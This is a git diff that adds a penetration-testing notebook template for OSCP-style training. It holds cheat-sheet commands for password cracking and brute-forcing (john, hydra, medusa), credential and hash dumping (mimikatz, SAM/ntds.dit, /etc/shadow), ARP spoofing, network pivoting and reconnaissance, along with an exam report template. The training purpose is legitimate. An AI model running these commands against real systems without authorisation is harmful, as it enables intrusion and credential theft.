+BENCHMARK TEST
+- john --test
+
+SESSION NAME
+- john hash.txt --session=example_name
+
+SESSION RESTORE
+- john --restore=example_name
+
+SHOW CRACKED RESULTS
+- john hash.txt --pot=<john potfile> --show
+
+WORDLIST GENERATION
+- john --wordlist=dict.txt --stdout --external:[filter name] > out.txt
+
+CRACKING SSH KEYS:
+
+- /usr/share/john/ssh2john.py id_rsa > hash.john
+- john --wordlist=/usr/share/wordlists/rockyou.txt hash.john
+
+CRACKING KRB5TGS KEYS
+
+- john --format=krb5tgs --wordlist=<passwords_file krb-key.txt
+
+Cracking ASREP Keys
+
+- john --format=krb5asrep --wordlist=<passwords_file asrep-key.txt
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Wordlists.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Wordlists.md
new file mode 100644
index 0000000..7f9513c
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Wordlists.md	
@@ -0,0 +1,40 @@
+## Local in Kali: 
+
+/usr/share/wordlists
+
+## Other Resources:
+
+Have I been Pwned
+
+- https://haveibeenpwned.com/Passwords
+
+Seclists: 
+
+- In Kali: apt install seclists
+- Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames
+- Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords
+
+Crackstation's Dictionary List: 
+
+- https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
+
+Rainbow Tables (Rainbow Crack):
+
+- http://project-rainbowcrack.com/table.htm
+
+Rocktastic Mega Wordlist:
+
+- https://labs.nettitude.com/tools/rocktastic/
+
+berzerk0 wordlist: 
+
+- https://www.hack3r.com/forum-topic/wikipedia-wordlist
+
+Weakpass: 
+
+- https://www.hack3r.com/forum-topic/wikipedia-wordlist
+
+Tools to make your own wordlists: 
+
+- Crunch
+- Cewl
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Identifying Hash Types.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Identifying Hash Types.md
new file mode 100644
index 0000000..81c30dd
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Identifying Hash Types.md	
@@ -0,0 +1,7 @@
+In Kali: 
+
+- Hash-identifier
+
+Online: 
+
+- Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Hydra.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Hydra.md
new file mode 100644
index 0000000..f6eadaa
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Hydra.md	
@@ -0,0 +1,5 @@
+- hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22
+
+- hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22
+
+- hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Medusa.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Medusa.md
new file mode 100644
index 0000000..87ecf79
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Medusa.md	
@@ -0,0 +1,13 @@
+- medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 
+
+- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp
+
+- medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 
+
+- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222
+
+- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt
+
+
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Dumping Hashes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Dumping Hashes.md
new file mode 100644
index 0000000..35a4638
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Dumping Hashes.md	
@@ -0,0 +1,59 @@
+# Windows: 
+
+## Meterpreter HashDump
+
+- run post/windows/gather/hashdump
+
+## Meterpreter Mimikatz (Post Exploitation must be executed from SYSTEM privileges)
+
+- load mimikatz
+- creds_all
+
+DUMP LSA SECRETS
+- lsadump.py sys_backup.hiv sec_backup.hiv
+
+DUMP LOCAL PASSWORD HASHES
+
+- pwdump.py sys_backup.hiv sec_backup.hiv
+
+## reg.exe 
+
+- reg save HKLM\sam sam
+- reg save HKLM\system system
+
+## samdump2
+
+- samdump2 SYSTEM SAM > hashes.db
+
+## Impacket Tools: 
+
+- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes
+
+If you have the NTDS.dit file and the SYSTEM hive: 
+
+- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
+
+# Linux
+
+Requires Root Privileges
+
+- cat /etc/shadow
+
+- cp /etc/passwd and shadow
+- unshadow passwd shadow 
+
+#  OSX
+
+10.5-10.7
+
+- dscl localhost -read /Search/Users/<username>|grep GeneratedUID|cut -c15-cat
+/var/db/shadow/hash/<GUID> | cut -c169-216 > osx_hash.txt
+
+10.8-10.12
+
+- sudo defaults read /var/db/dslocal/nodes/Default/users/<username>.plist ShadowHashData|tr -dc ‘
+0-9a-f’|xxd -p -r|plutil -convert xml1 - -o -
+
+# Other Resources: 
+
+- Lsassy: https://github.com/Hackndo/lsassy
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Passwords/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Passwords/General Notes.md
new file mode 100644
index 0000000..6db5b74
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Passwords/General Notes.md	
@@ -0,0 +1 @@
+# Any passwords or hashs that you fine should be documented here. Include steps on how you were able to obtain them from your target:
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Proof_Screenshots/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Proof_Screenshots/Target _1.md
new file mode 100644
index 0000000..56b7267
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Proof_Screenshots/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your targets here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/OSCP Report Template.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/OSCP Report Template.md
new file mode 100644
index 0000000..055c5d1
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/OSCP Report Template.md	
@@ -0,0 +1,365 @@
+
+# <div align="center"> Offensive Security Lab/Exam Penetration Test Report </div>
+
+![d2550626a1c94aeebd273d43be0669c9.png](../../_resources/d2550626a1c94aeebd273d43be0669c9.png)
+
+## <div align="center">  student@emailaddress.com Student-ID </div>
+
+###### <div align="center"> 2020-XX-XX </div>
+
+
+<div style="page-break-after: always;"></div>
+
+## Contents
+
+- 1 Offensive Security Exam Penetration Test Report
+   - 1.1 Introduction
+   - 1.2 Objective
+   - 1.3 Requirements
+- 2 High-Level Summary
+   - 2.1 Recommendations
+- 3 Methodologies
+   - 3.1 Information Gathering
+   - 3.2 Penetration
+      - 3.2.1 System IP: 192.168.x.x
+         - 3.2.1.1 Service Enumeration
+         - 3.2.1.2 Privilege Escalation
+      - 3.2.2 System IP: 192.168.x.x
+         - 3.2.2.1 Service Enumeration
+         - 3.2.2.2 Privilege Escalation
+      - 3.2.3 System IP: 192.168.x.x
+         - 3.2.3.1 Service Enumeration
+         - 3.2.3.2 Privilege Escalation
+      - 3.2.4 System IP: 192.168.x.x
+         - 3.2.4.1 Service Enumeration
+         - 3.2.4.2 Privilege Escalation
+      - 3.2.5 System IP: 192.168.x.x
+   - 3.3 Maintaining Access
+   - 3.4 House Cleaning
+- 4 Additional Items
+   - 4.1 Appendix - Proof and Local Contents:
+   - 4.2 Appendix - Metasploit/Meterpreter Usage
+
+<div style="page-break-after: always;"></div>
+
+## Introduction
+
+The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security exam.
+This report will be graded from a standpoint of correctness and fullness to all aspects of the exam.
+The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.
+
+## Objective
+
+The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab/Exam network.
+The student is tasked with following methodical approach in obtaining access to the objective goals.
+This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
+An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course.
+Use the sample report as a guideline to get you through the reporting.
+
+## Requirements
+
+The student will be required to fill out this penetration testing report fully and to include the following sections:
+
+- Overall High-Level Summary and Recommendations (non-technical)
+- Methodology walkthrough and detailed outline of steps taken
+- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
+- Any additional items that were not included
+
+<div style="page-break-after: always;"></div>
+
+# High-Level Summary
+
+I was tasked with performing an internal penetration test towards Offensive Security Exam.
+An internal penetration test is a dedicated attack against internally connected systems.
+The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam systems – the THINC.local domain.
+My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
+
+When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network.
+When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
+During the testing, I had administrative level access to multiple systems.
+All systems were successfully exploited and access granted.
+These systems as well as a brief description on how access was obtained are listed below:
+
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - BOF
+
+## Recommendations
+
+I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
+One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
+
+<div style="page-break-after: always;"></div>
+
+# Methodologies
+
+I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Exam environments is secured.
+Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
+
+## Information Gathering
+
+The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
+During this penetration test, I was tasked with exploiting the exam network.
+The specific IP addresses were:
+
+**Exam Network**
+
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+
+## Penetration
+
+The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
+During this penetration test, I was able to successfully gain access to **X** out of the **X** systems.
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
+This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
+Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
+In some cases, some ports may not be listed.
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+**Vulnerability Exploited: **
+
+**Proof Screenshot:**
+
+<div style="page-break-after: always;"></div>
+
+## Maintaining Access
+
+Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
+The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
+Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
+
+## House Cleaning
+
+The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
+Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.
+Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
+
+After collecting trophies from the exam network was completed, Alec removed all user accounts and passwords as well as the Meterpreter services installed on the system.
+Offensive Security should not have to remove any user accounts or services from the system.
+
+<div style="page-break-after: always;"></div>
+
+
+# Additional Items
+
+## Appendix - Proof and Local Contents:
+
+IP (Hostname) | Local.txt Contents | Proof.txt Contents
+--------------|--------------------|-------------------
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+
+## Appendix - Metasploit/Meterpreter Usage
+
+For the exam, I used my Metasploit/Meterpreter allowance on the following machine: `192.168.x.x`
+
+<br>
+
+<center>
+
+![310x310.png](../../_resources/310x310.png) 
+
+</center>
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/Tips for Writing a Report.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/Tips for Writing a Report.md
new file mode 100644
index 0000000..0fa6735
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/Tips for Writing a Report.md	
@@ -0,0 +1,18 @@
+1. Understand who is going to be reading this and who is the target audience?
+2. The report needs to clear that a non-technical person would understand 
+3. Report should include the following: 
+	1. Executive Summary
+	2. Technical Summary
+	3. Detail Report of findings
+	4. Recommendations for remediation (If possible)
+
+
+
+Resources:
+
+- https://blog.zsec.uk/ltr101-pentest-reporting/
+- https://github.com/juliocesarfort/public-pentesting-reports
+
+Public Pentesting Reports: 
+
+- https://github.com/juliocesarfort/public-pentesting-reports
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/General Information.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/General Information.md
new file mode 100644
index 0000000..1ef94c2
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/General Information.md	
@@ -0,0 +1,29 @@
+Created by TJ Null:
+
+Twitter: https://twitter.com/TJ_Null
+Github: https://github.com/tjnull
+
+Contribution: 
+
+If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here:
+- https://github.com/tjnull/TJ-JPT
+
+## Changelog:
+
+v1.0: Original Template
+
+v2.0
+
+2. Enumeration 
+- Added an FTP Notebook to include notes for that identified service
+- Added more content in Active Directory
+- Web has a subnotebook to include any content from the changelog.txt file
+- Fixed the gobuster oneliners to match with the recent changes from the tool
+
+3. Exploitation
+- Added some custom options for searchsploit
+
+4. Post Exploitation
+- Moved the subnotebook into a subnotebook (Target #1) so the user can copy the subnotebook and add another one under post exploitation for other targets. 
+- Created a sub notebook to include the output from automated priv esc scripts that are used.
+- Included tools, tips, and resources in all sections for priv esc
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/Pivoting_Tunneling.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/Pivoting_Tunneling.md
new file mode 100644
index 0000000..fbd6f11
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/Pivoting_Tunneling.md	
@@ -0,0 +1,106 @@
+# Check if your tunnel is active and running: 
+
+- nc -z localhost <port> || echo 'no tunnel open'
+- netstat -lpnt | grep <port>| grep ssh
+- ps aux | grep ssh
+
+
+
+# SSH Tunneling
+
+
+Note: Target must have SSH running for there service
+
+1. Create SSH Tunnel: ssh -D localhost:<local port> -f -N user@localhost -p <Target Port>
+2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
+3. Add the following line into the config: Socks5 127.0.0.1 <Local Port>
+4. Run commands through the tunnel: proxychains <command>
+
+## SShuttle
+
+In Kali
+
+Source: https://github.com/sshuttle/sshuttle
+
+- sshuttle -r root@172.21.0.0 10.2.2.0/24
+
+
+# Meterpreter
+
+Use only if you have a meterpreter shell and you need to pivot to another network.
+
+## Portfwd
+
+- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80
+
+## Autoroute
+In Metasploit
+1. use post/multi/manage/autoroute
+```
+msf5 post(multi/manage/autoroute) > options
+
+Module options (post/multi/manage/autoroute):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
+   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
+   SESSION                   yes       The session to run this module on.
+   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)
+
+msf5 post(multi/manage/autoroute) > 
+```
+2. set session <avaliable session>
+3. run  
+
+## Metasploit Socks Proxy
+
+   1  auxiliary/server/socks4a                                  normal  No     Socks4a Proxy Server
+   2  auxiliary/server/socks5                                   normal  No     Socks5 Proxy Server
+   3  auxiliary/server/socks_unc                                normal  No     SOCKS Proxy UNC Path Redirection
+
+# Ncat
+
+## Http Proxy
+- ncat -vv --listen 3128 --proxy-type http
+
+## Port Forwarder
+1. mknod pivot p
+2. nc -l -p < port to listen on> 0<pivot | nc <target> <pivot-port> 1>pivot
+
+# Cntlm
+
+apt install cntlm
+
+1. cntlm -u username@breakme.local -I proxy
+2. export http://127.0.0.1:3128, export https://127.0.0.1:3128
+3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128"
+
+# netsh port forwarding
+- netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
+- netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000
+
+
+# Proxy Binaries for Windows
+Windows 10 has SSH (Thanks WSL!)
+plink.exe (In Kali)
+
+# Other Tools:
+- ssf: https://github.com/securesocketfunneling/ssf
+- rpivot: https://github.com/klsecservices/rpivot
+- hans (ICMP Tunneling): http://code.gerade.org/hans/
+- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
+- Dnscat2: https://github.com/iagox86/dnscat2
+- Chisel: https://github.com/jpillora/chisel
+- httptunnel: In Kali apt install httptunnel
+- ligolo: https://github.com/sysdream/ligolo
+- reGeorg: https://github.com/sensepost/reGeorg
+- 
+
+
+# Other Resources:
+
+- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
+- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
+- https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464
+
diff --git a/Pentest_Template_Master_2.0/_resources/310x310.png b/Pentest_Template_Master_2.0/_resources/310x310.png
new file mode 100755
index 0000000..7ebd5b4
Binary files /dev/null and b/Pentest_Template_Master_2.0/_resources/310x310.png differ
diff --git a/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png b/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png
new file mode 100644
index 0000000..fa27c6c
Binary files /dev/null and b/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png differ
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/DNS_Hostname Discovery.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/DNS_Hostname Discovery.md
new file mode 100644
index 0000000..27ceb65
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/DNS_Hostname Discovery.md	
@@ -0,0 +1,68 @@
+# DNS Discovery
+
+DNSRecon: 
+
+- dnsrecon -d www.example.com -a 
+- dnsrecon -d www.example.com -t axfr
+- dnsrecon -d <startIP-endIP>
+- dnsrecon -d www.example.com -D <namelist> -t brt
+
+Dig: 
+
+- dig www.example.com + short
+- dig www.example.com MX
+- dig www.example.com NS
+- dig www.example.com> SOA
+- dig www.example.com ANY +noall +answer
+- dig -x www.example.com
+- dig -4 www.example.com (For IPv4)
+- dig -6 www.example.com (For IPv6)
+- dig www.example.com mx +noall +answer example.com ns +noall +answer
+- dig -t AXFR www.example.com
+
+Dnsenum Enumeration:
+
+- dnsenum --dnsserver 172.21.0.0 -enum intranet.megacorpone.xx
+- dnsenum --dnsserver 172.21.0.0 -enum management.megacorpone.xx
+- dnsenum --dnsserver 172.21.0.0 -enum www.megacorpone.xx
+
+dnsX Enumeration: 
+- dnsx -l domains.txt -resp -a -aaaa -cname -mx -ns -soa -txt
+- dnsx -silent -d megacorpone.com -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt
+
+Using with subfinder: 
+- subfinder -silent -d megacorpone.com | dnsx -silent
+- subfinder -silent -d megacorpone.com | dnsx -silent -a -resp
+- subfinder -silent -d megacorpone.com | dnsx -silent -a -resp-only
+- subfinder -silent -d megacorpone.com | dnsx -silent -cname -resp
+- subfinder -silent -d megacorpone.com | dnsx -silent -asn 
+
+
+Nmap Enumeration: 
+```
+$ ls -lh /usr/share/nmap/scripts/ | grep dns
+-rw-r--r-- 1 root root  1499 Oct 12 09:29 broadcast-dns-service-discovery.nse
+-rw-r--r-- 1 root root  5329 Oct 12 09:29 dns-blacklist.nse
+-rw-r--r-- 1 root root 10100 Oct 12 09:29 dns-brute.nse
+-rw-r--r-- 1 root root  6639 Oct 12 09:29 dns-cache-snoop.nse
+-rw-r--r-- 1 root root 15152 Oct 12 09:29 dns-check-zone.nse
+-rw-r--r-- 1 root root 14826 Oct 12 09:29 dns-client-subnet-scan.nse
+-rw-r--r-- 1 root root 10168 Oct 12 09:29 dns-fuzz.nse
+-rw-r--r-- 1 root root  3803 Oct 12 09:29 dns-ip6-arpa-scan.nse
+-rw-r--r-- 1 root root 12702 Oct 12 09:29 dns-nsec3-enum.nse
+-rw-r--r-- 1 root root 10580 Oct 12 09:29 dns-nsec-enum.nse
+-rw-r--r-- 1 root root  3441 Oct 12 09:29 dns-nsid.nse
+-rw-r--r-- 1 root root  4364 Oct 12 09:29 dns-random-srcport.nse
+-rw-r--r-- 1 root root  4363 Oct 12 09:29 dns-random-txid.nse
+-rw-r--r-- 1 root root  1456 Oct 12 09:29 dns-recursion.nse
+-rw-r--r-- 1 root root  2195 Oct 12 09:29 dns-service-discovery.nse
+-rw-r--r-- 1 root root  5679 Oct 12 09:29 dns-srv-enum.nse
+-rw-r--r-- 1 root root  5765 Oct 12 09:29 dns-update.nse
+-rw-r--r-- 1 root root  2123 Oct 12 09:29 dns-zeustracker.nse
+-rw-r--r-- 1 root root 26574 Oct 12 09:29 dns-zone-transfer.nse
+-rw-r--r-- 1 root root  3910 Oct 12 09:29 fcrdns.nse
+```
+-nmap x.x.x.x -v -p 53 --script=exampleScript1.nse,exampleScript2.nse
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Domain_Sub Domain Discovery.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Domain_Sub Domain Discovery.md
new file mode 100644
index 0000000..d8351b7
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Domain_Sub Domain Discovery.md	
@@ -0,0 +1,17 @@
+# Domain Discovery
+
+Sublis3r:
+
+- Sublist3r -d www.example.com
+- Sublist3r -v -d www.example.com -p 80,443
+
+Subfinder: 
+- subfinder -d megacorpone.com
+
+OWASP AMASS: 
+
+- amass enum -d www.example.com
+- amass intel -whois -d www.example.com
+- amass intel -active 172.21.0.0-64 -p 80,443,8080,8443
+- amass intel -ipv4 -whois -d www.example.com
+- amass intel -ipv6 -whois -d www.example.com
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Network Discovery Scans.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Network Discovery Scans.md
new file mode 100644
index 0000000..7af110b
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Network Discovery Scans.md	
@@ -0,0 +1,112 @@
+# NetDiscover (ARP Scanning):
+- netdiscover -i eth0
+- netdiscover -r 172.21.10.0/24
+
+# Dsniff Arpspoof
+
+First enable Linux box to act as a router:
+
+`echo 1 > /proc/sys/net/ipv4/ip_forward`
+
+Then run `arpspoof`:
+
+`arpspoof -i <interface> -t <target> -r <host>`
+
+For example, to intercept traffic between targets, use:
+
+`arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16`
+
+# Nmap:
+
+- nmap -sn 172.21.10.0/24
+- nmap -sn 172.21.10.1-253
+- nmap -sn 172.21.10.*
+
+You can also grep out the IPs and cut out fluf:
+```
+nmap -sn 172.x.x.x/24 | grep "172" | cut -f 5 -d ' '
+```
+
+A slower, more stealthier approach that utilizes the files containing the IP address split (as seen in the first section above) would be:
+```
+nmap --randomize-hosts -sn -T2 -oN nmap_discoveryScan_x.x.x.x-16.txt -iL x.x.x.x_IP_range.split.txt
+```
+This will export the results into a text file (`-oN`). Randomized hosts is optional, depending on the customer and the testing situation. The flag, `-oA`, can be used in place of `-oX` or `-oN`, as `-oA` will output the results to all output formats. 
+
+The results for both command options shown above will be the list of hosts that responded to the ping, thus are up and alive.
+
+# Nbtscan: 
+- nbtscan -r 172.21.1.0/24
+
+# Masscan
+- masscan 172.21.10.0/24 --ping
+
+# Ping Sweeps
+
+## Linux Ping Sweep (Bash)
+
+- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done
+
+## Windows Ping Sweep (Run on Windows System)
+
+- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.1.%i is up.
+
+## Powershell Ping Sweep: 
+Note: This command can also run on powershell for Linux
+
+- 1..20 | % {"172.21.10.$($_): $(Test-Connection -count 1 -comp 172.21.10.$($_) -quiet)"}
+- Get-PingSweep Subnet 172.21.10
+```
